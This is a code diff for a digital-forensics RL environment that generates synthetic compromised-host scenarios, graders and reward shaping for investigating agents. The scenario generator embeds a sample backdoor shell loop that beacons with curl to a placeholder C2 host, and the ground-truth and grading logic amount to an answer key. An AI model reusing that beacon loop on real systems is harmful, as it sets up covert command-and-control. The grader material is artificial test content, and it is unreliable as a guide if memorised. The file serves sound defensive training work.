+    from grader import grade  # type: ignore
+    from scenario_generator import generate_scenario  # type: ignore
+    from scenarios import DEFAULT_TASK_ID, SCENARIOS  # type: ignore
 MAX_STEPS_PER_EPISODE = 30
+# Exploration shaping reward — small positive reward the first time the agent
+# reads one of the scenario's "canonical forensic artifacts" (auth.log, bash
+# histories, cron files, backdoor path, etc.). Capped so the terminal grader
+# reward always dominates the trajectory return.
+SHAPING_REWARD_PER_READ = 0.02
+SHAPING_REWARD_CAP = 0.10
+def _canonical_artifacts(scenario: dict) -> set:
+    """
+    Pick out the set of paths in a scenario that a good investigator *should*
+    read. For hand-authored scenarios we use the ground-truth modified_files
+    plus a fixed set of classic forensic log paths. For generated scenarios we
+    also include the bash history of the compromised user.
+    """
+    gt = scenario.get("ground_truth", {}) or {}
+    paths: set = set()
+    paths.update(gt.get("modified_files", []) or [])
+    for p in (
+        "/var/log/auth.log",
+        "/var/log/auth.log.1",
+        "/etc/passwd",
+        "/etc/shadow",
+    ):
+        if p in scenario.get("filesystem", {}):
+            paths.add(p)
+    user = gt.get("compromised_user")
+    if user:
+        bh = f"/home/{user}/.bash_history"
+        if bh in scenario.get("filesystem", {}):
+            paths.add(bh)
+    return paths
 def _as_bytes(content) -> bytes:
     if isinstance(content, bytes):
         self._fs: Dict[str, object] = {}
         self._done: bool = False
         self._steps_used: int = 0
+        self._useful_read: set = set()      # paths already rewarded
+        self._shaping_total: float = 0.0    # running sum, capped at SHAPING_REWARD_CAP
+        self._canonical: set = set()        # per-episode canonical artifact set
     # ---- episode lifecycle ---------------------------------------------------
     def reset(
+        self,
+        task_id: Optional[str] = None,
+        seed: Optional[int] = None,
+        difficulty: Optional[int] = None,
+        pattern: Optional[str] = None,
+        **kwargs,
     ) -> ForensicShellObservation:
+        """
+        Load either a hand-authored scenario (by task_id) OR a procedurally
+        generated one (by seed+difficulty+pattern). If seed is given, generator
+        wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
+        """
+        if seed is not None:
+            scenario = generate_scenario(
+                seed=int(seed),
+                difficulty=int(difficulty) if difficulty is not None else 3,
+                pattern=pattern,
+            )
+            self._task_id = scenario["task_id"]
+            self._scenario = scenario
+        else:
+            env_task = os.getenv("FORENSIC_TASK_ID")
+            chosen = task_id or env_task or DEFAULT_TASK_ID
+            if chosen not in SCENARIOS:
+                chosen = DEFAULT_TASK_ID
+            self._task_id = chosen
+            self._scenario = SCENARIOS[chosen]
         self._fs = dict(self._scenario["filesystem"])
         self._done = False
         self._steps_used = 0
+        self._useful_read = set()
+        self._shaping_total = 0.0
+        self._canonical = _canonical_artifacts(self._scenario)
         self._state = State(episode_id=str(uuid4()), step_count=0)
         return ForensicShellObservation(
                 return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "read_file":
+                path = action.path or ""
+                out, err = self._do_read_file(path, action.max_bytes or 2048)
+                shaped = self._award_shaping(path) if err is None else 0.0
+                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
             if verb == "grep":
+                path = action.path or ""
+                out, err = self._do_grep(action.pattern or "", path)
+                shaped = self._award_shaping(path) if err is None else 0.0
+                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
             if verb == "stat":
                 out, err = self._do_stat(action.path or "")
                 reward=0.0,
             )
+    # ---- shaping reward -----------------------------------------------------
+    def _award_shaping(self, path: str) -> float:
+        """
+        Return +SHAPING_REWARD_PER_READ the first time the agent touches a
+        canonical forensic artifact, capped so the cumulative shaping stays
+        <= SHAPING_REWARD_CAP across the episode.
+        """
+        if not path or path not in self._canonical:
+            return 0.0
+        if path in self._useful_read:
+            return 0.0
+        if self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP:
+            return 0.0
+        self._useful_read.add(path)
+        grant = min(SHAPING_REWARD_PER_READ, SHAPING_REWARD_CAP - self._shaping_total)
+        self._shaping_total += grant
+        return float(grant)
     # ---- action primitives ---------------------------------------------------
     def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
             metadata=meta,
         )
+    # ---- state + metadata ----------------------------------------------------
     @property
     def state(self) -> State:
         return self._state
+    def get_metadata(self) -> EnvironmentMetadata:
+        """
+        Override the OpenEnv default to populate the /metadata endpoint with a real
+        name, description, embedded README, version, author, and docs URL — instead
+        of the boilerplate auto-derived from the class name.
+        """
+        readme_path = Path(__file__).resolve().parent.parent / "README.md"
+        readme_content: Optional[str] = None
+        if readme_path.exists():
+            try:
+                readme_content = readme_path.read_text(encoding="utf-8")
+            except OSError:
+                readme_content = None
+        return EnvironmentMetadata(
+            name="ForensicShell",
+            description=(
+                "Digital-forensics investigation environment for OpenEnv RL. The "
+                "agent reads logs, hashes backdoors, and reconstructs attacker "
+                "kill-chains across 5 attack patterns and 5 difficulty tiers. "
+                "Procedural scenarios via deterministic seeds; deterministic "
+                "graders return rewards in [0, 1] with partial credit (Jaccard, "
+                "F1, Kendall-tau)."
+            ),
+            readme_content=readme_content,
+            version="0.2.0",
+            author="yashppawar",
+            documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
+        )

server/grader.py CHANGED Viewed

@@ -122,9 +122,26 @@ GRADERS = {
 }
 def grade(task_id: str, report: Dict, truth: Dict) -> float:
     """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
-    fn = GRADERS.get(task_id)
     if fn is None:
         return 0.0
     score = fn(report or {}, truth or {})

 }
+def _grade_generic(report: Dict, truth: Dict) -> float:
+    """
+    Dispatcher for procedurally generated scenarios. Picks the right sub-grader
+    by inspecting which fields are present in the ground-truth dict. This keeps
+    the grader agnostic to task_id naming and lets the generator add richer
+    fields without touching this module.
+    """
+    if "timeline" in truth:
+        return _grade_t3_timeline(report, truth)
+    if "backdoor_sha256" in truth:
+        return _grade_t2_modified(report, truth)
+    return _grade_t1_login(report, truth)
 def grade(task_id: str, report: Dict, truth: Dict) -> float:
     """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
+    if task_id and task_id.startswith("gen_"):
+        fn = _grade_generic
+    else:
+        fn = GRADERS.get(task_id)
     if fn is None:
         return 0.0
     score = fn(report or {}, truth or {})

server/name_pools.py ADDED Viewed

	@@ -0,0 +1,62 @@

+"""
+Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
+and IP addresses. Everything public-facing lives in RFC 5737 / RFC 3849 ranges so
+the synthetic data can never collide with real production IPs.
+"""
+# 40 common names + a few IT-flavored accounts. Excludes 'root' from the compromise
+# target pool because it's structurally weird ("root was compromised via ssh brute")
+# even though real incidents exist.
+USERNAMES = [
+    "alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
+    "ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
+    "quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
+    "yara", "zach", "maya", "theo", "lara", "jonas",
+    "devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
+    "releng", "admin2", "ops",
+]
+# Decoy (benign) user accounts used to populate /etc/passwd and /home.
+DECOY_USERS = [
+    "guest", "backup", "mail", "www-data", "postfix", "systemd-network",
+]
+HOSTNAMES = [
+    "webhost", "db01", "api-gateway", "worker-03", "cache-redis",
+    "staging", "bastion", "ingest", "ci-runner", "monitoring",
+    "edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
+]
+# RFC 5737 "documentation" ranges — safe to use, never routable.
+PUBLIC_CIDRS = [
+    "192.0.2.",    # TEST-NET-1
+    "198.51.100.", # TEST-NET-2
+    "203.0.113.",  # TEST-NET-3
+]
+# RFC 1918 private space — used for legit internal traffic noise.
+INTERNAL_CIDRS = [
+    "10.0.0.",
+    "10.0.1.",
+    "172.16.0.",
+    "192.168.1.",
+]
+def sample_public_ip(rng) -> str:
+    """Sample an attacker-looking IP from RFC 5737 test ranges."""
+    return rng.choice(PUBLIC_CIDRS) + str(rng.randint(2, 254))
+def sample_internal_ip(rng) -> str:
+    """Sample a legit-looking internal IP from RFC 1918."""
+    return rng.choice(INTERNAL_CIDRS) + str(rng.randint(2, 254))
+def sample_username(rng, exclude=()) -> str:
+    candidates = [u for u in USERNAMES if u not in exclude]
+    return rng.choice(candidates)
+def sample_hostname(rng) -> str:
+    return rng.choice(HOSTNAMES)

server/scenario_generator.py ADDED Viewed

	@@ -0,0 +1,315 @@

+"""
+Procedural scenario generator for ForensicShell.
+Pure function of (seed, difficulty, pattern). Identical inputs always produce
+identical scenarios, so seeds work as train/val/test splits and make curricula
+reproducible. No global random state is touched.
+Public API:
+    generate_scenario(seed, difficulty=3, pattern=None) -> dict
+The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
+scenarios.py — it is a drop-in replacement the env can load through reset().
+Difficulty tiers:
+    1  easy     user + ip
+    2  medium   + modified_files + backdoor_sha256
+    3  medium+  same as 2 but more noise
+    4  hard     + timeline, with red-herring content
+    5  hard+    same as 4 with extra red herrings and more complex timeline
+"""
+from __future__ import annotations
+import hashlib
+import random
+from datetime import datetime, timedelta
+from types import SimpleNamespace
+from typing import Dict, Optional
+from .attack_patterns import PATTERNS
+from .name_pools import (
+    DECOY_USERS,
+    HOSTNAMES,
+    sample_hostname,
+    sample_internal_ip,
+    sample_public_ip,
+    sample_username,
+)
+# ---------------------------------------------------------------------------
+# Deterministic seed → backdoor bytes
+# ---------------------------------------------------------------------------
+def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
+    """
+    Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
+    (seed, pattern) so two generated scenarios with the same seed/pattern have
+    the same SHA256 — matches what the grader will compare against.
+    """
+    short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
+    header = (
+        f"#!/bin/sh\n"
+        f"# synthetic payload {pattern}\n"
+        f"# seed={seed} slug={short}\n"
+    ).encode()
+    body = (
+        f"while :; do\n"
+        f"  curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
+        f"  sleep 60\n"
+        f"done\n"
+    ).encode()
+    payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
+    return payload, hashlib.sha256(payload).hexdigest(), short
+def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
+    """Where the pattern drops its persistence blob."""
+    if pattern_tag == "webshell":
+        return f"/var/www/html/.{short}.bin"
+    if pattern_tag == "supply_chain":
+        return f"/tmp/.{short}"
+    if pattern_tag == "insider":
+        return "/tmp/.staging/dump.sql"
+    if pattern_tag == "ssh_key_theft":
+        return f"/usr/local/sbin/.{short}"
+    return f"/usr/local/bin/.{short}"
+# ---------------------------------------------------------------------------
+# Filesystem + ground-truth assembly
+# ---------------------------------------------------------------------------
+def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
+    """Render benign, plausible auth log entries to pad the log."""
+    out = []
+    for i in range(lines):
+        ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
+        who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
+        internal = "10.0.0." + str(rng.randint(2, 200))
+        kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
+        if kind == "Accepted publickey":
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
+            )
+        elif kind == "session opened":
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
+            )
+        else:
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
+            )
+    return out
+def _passwd_file(main_user: str, rng) -> str:
+    users = list(DECOY_USERS) + [main_user]
+    rng.shuffle(users)
+    lines = ["root:x:0:0:root:/root:/bin/bash"]
+    uid = 1000
+    for u in users:
+        lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash")
+        uid += 1
+    return "\n".join(lines) + "\n"
+def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
+    """
+    Inject decoy content at difficulty >= 4.
+    Returns a dict of extra filesystem entries. None of these should end up in
+    ground_truth.modified_files.
+    intensity: 1 (diff 4) or 2 (diff 5+).
+    """
+    extras = {}
+    # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP
+    decoy_ip = sample_public_ip(rng)
+    extras["/var/log/auth.log.1"] = (
+        f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} "
+        f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
+        f"port {rng.randint(30000, 65000)} ssh2\n"
+        f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} "
+        f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
+    )
+    # 2. A decoy user's bash_history with suspicious-looking-but-benign commands
+    decoy_user = rng.choice(DECOY_USERS)
+    extras[f"/home/{decoy_user}/.bash_history"] = (
+        "ls -la\n"
+        "sudo systemctl status cron\n"
+        "curl https://api.github.com/users/torvalds\n"
+        "python3 -m http.server 8000 &\n"
+        "pkill -f http.server\n"
+    )
+    if intensity >= 2:
+        # 3. A /tmp/.cache binary with random bytes — agent might stat/sha it and submit wrongly
+        junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
+        extras["/tmp/.cache"] = junk
+        # 4. A decoy cron that looks suspicious but is benign
+        extras["/etc/cron.d/backup-nightly"] = (
+            "# Nightly backup — owned by ops team\n"
+            "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
+        )
+    return extras
+# ---------------------------------------------------------------------------
+# Main public function
+# ---------------------------------------------------------------------------
+def generate_scenario(
+    seed: int,
+    difficulty: int = 3,
+    pattern: Optional[str] = None,
+) -> Dict:
+    """
+    Deterministic scenario generator.
+    Args:
+        seed: any integer — identical inputs yield identical scenarios
+        difficulty: 1..5 (clamped)
+        pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed
+    Returns:
+        dict with keys: task_id, difficulty, description, filesystem, ground_truth
+    """
+    if difficulty < 1:
+        difficulty = 1
+    if difficulty > 5:
+        difficulty = 5
+    rng = random.Random(int(seed))
+    # 1. pick pattern
+    if pattern is None:
+        pattern = rng.choice(list(PATTERNS.keys()))
+    if pattern not in PATTERNS:
+        raise ValueError(f"unknown pattern: {pattern}")
+    # 2. sample entities
+    host = sample_hostname(rng)
+    main_user = sample_username(rng)
+    if pattern == "insider":
+        attacker_ip = sample_internal_ip(rng)
+    else:
+        attacker_ip = sample_public_ip(rng)
+    # 3. base timestamp — always in 2025, deterministic
+    day_offset = rng.randint(0, 365)
+    hour = rng.randint(8, 22)
+    minute = rng.randint(0, 59)
+    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)
+    # 4. synthesize backdoor payload
+    bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
+    bd_path = _backdoor_path_for(pattern, short, main_user)
+    ctx = SimpleNamespace(
+        rng=rng,
+        user=main_user,
+        ip=attacker_ip,
+        host=host,
+        ts_base=ts_base,
+        backdoor_bytes=bd_bytes,
+        backdoor_sha256=bd_sha,
+        backdoor_path=bd_path,
+        short=short,
+    )
+    # 5. run the pattern template
+    pattern_fn = PATTERNS[pattern]
+    result = pattern_fn(ctx)
+    # 6. build filesystem
+    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
+    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
+    filesystem: Dict[str, object] = {
+        "/var/log/auth.log": auth_log,
+        f"/home/{main_user}/.bash_history": result["bash_history"],
+        "/etc/passwd": _passwd_file(main_user, rng),
+        "/etc/hostname": f"{host}\n",
+        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
+    }
+    # add pattern-specific modified files
+    for path, content in result["modified_files"].items():
+        filesystem[path] = content
+    # 7. red herrings
+    if difficulty >= 4:
+        intensity = 1 if difficulty == 4 else 2
+        herrings = _red_herrings(rng, host, ts_base, intensity)
+        for path, content in herrings.items():
+            if path in filesystem:
+                continue  # never overwrite a real artifact
+            filesystem[path] = content
+    # 8. path-collision sanity check (duplicate keys impossible in a dict, but
+    #    ensure every ground-truth path actually exists in the filesystem)
+    for p in result["modified_paths"]:
+        assert p in filesystem, f"ground-truth path not in filesystem: {p}"
+    # 9. assemble ground truth by difficulty tier
+    gt: Dict = {
+        "compromised_user": main_user,
+        "initial_ip": attacker_ip,
+    }
+    if difficulty >= 2:
+        gt["modified_files"] = list(result["modified_paths"])
+        gt["backdoor_sha256"] = bd_sha
+    if difficulty >= 4:
+        gt["timeline"] = list(result["timeline"])
+    task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"
+    description = _describe(difficulty, pattern, main_user, host)
+    return {
+        "task_id": task_id,
+        "difficulty": _difficulty_label(difficulty),
+        "description": description,
+        "filesystem": filesystem,
+        "ground_truth": gt,
+    }
+# ---------------------------------------------------------------------------
+# Small helpers
+# ---------------------------------------------------------------------------
+def _difficulty_label(d: int) -> str:
+    return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
+def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
+    base = (
+        f"Host '{host}' was compromised. Investigate the filesystem to determine "
+        f"what happened. Start by reading /var/log/auth.log and the shell histories "
+        f"under /home."
+    )
+    if difficulty == 1:
+        return (
+            f"{base} Report: compromised_user and initial_ip only. "
+            f"(Pattern: {pattern})"
+        )
+    if difficulty in (2, 3):
+        return (
+            f"{base} Report: compromised_user, initial_ip, modified_files "
+            f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
+            f"(Pattern: {pattern})"
+        )
+    return (
+        f"{base} Report: compromised_user, initial_ip, modified_files, "
+        f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
+        f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
+        f"present. (Pattern: {pattern})"
+    )